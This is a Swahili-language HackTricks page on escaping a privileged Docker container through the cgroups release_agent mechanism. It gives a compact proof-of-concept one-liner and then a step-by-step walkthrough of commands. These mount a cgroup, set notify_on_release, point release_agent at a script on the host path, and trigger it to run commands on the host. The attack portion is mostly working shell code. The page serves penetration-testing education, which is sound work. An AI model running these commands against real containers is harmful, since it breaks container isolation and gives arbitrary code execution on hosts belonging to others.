Docker release_agent cgroups escape

Jifunze na zoezi la AWS Hacking:Mafunzo ya HackTricks AWS Red Team Expert (ARTE) Jifunze na zoezi la GCP Hacking: Mafunzo ya HackTricks GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:

WhiteIntel

Kwa maelezo zaidi, tazama chapisho la blogi la asili. Hii ni muhtasari tu:

Poc ya Asili:

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

Uthibitisho wa dhana (PoC) unaonyesha njia ya kutumia cgroups kwa kuunda faili ya release_agent na kuzindua wito wake kutekeleza amri za kupindukia kwenye mwenyeji wa kontena. Hapa kuna maelezo ya hatua zilizohusika:

Andaa Mazingira:
- Dhibiti /tmp/cgrp inaundwa kutumika kama kituo cha kufunga kwa cgroup.
- Msimamizi wa cgroup wa RDMA unafungwa kwa saraka hii. Kwa kesi ya kutokuwepo kwa msimamizi wa RDMA, inapendekezwa kutumia msimamizi wa cgroup wa memory kama mbadala.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

Wekeza Kikundi cha Mtoto:

Kikundi cha mtoto kinachoitwa "x" kinaundwa ndani ya saraka iliyofungwa ya kikundi.
Taarifa zinaanzishwa kwa kikundi cha "x" kwa kuandika 1 kwenye faili yake ya notify_on_release.

echo 1 > /tmp/cgrp/x/notify_on_release

Sanidi Wakala wa Kutolewa:

Njia ya chombo kwenye mwenyeji inapatikana kutoka faili ya /etc/mtab.
Faili ya release_agent ya cgroup inasanidiwa kutekeleza script iliyoitwa /cmd iliyoko kwenye njia ya mwenyeji iliyopatikana.

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

Unda na Sanidi Skripti ya /cmd:

Skripti ya /cmd inaundwa ndani ya chombo na kusanidiwa kutekeleza ps aux, ikielekeza matokeo kwenye faili iliyoitwa /output kwenye chombo. Njia kamili ya /output kwenye mwenyeji inatajwa.

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

Kuzindua Shambulio:

Mchakato unaanzishwa ndani ya cgroup ya mtoto "x" na mara moja unakomeshwa.
Hii inazindua release_agent (script ya /cmd), ambayo inatekeleza ps aux kwenye mwenyeji na kuandika matokeo kwa /output ndani ya kontena.

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za kuiba.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:

WhiteIntel

Jifunze & jifanye AWS Hacking:Mafunzo ya HackTricks AWS Red Team Expert (ARTE) Jifunze & jifanye GCP Hacking: Mafunzo ya HackTricks GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Previousrelease_agent exploit - Relative Paths to PIDs NextSensitive Mounts

Last updated 8 days ago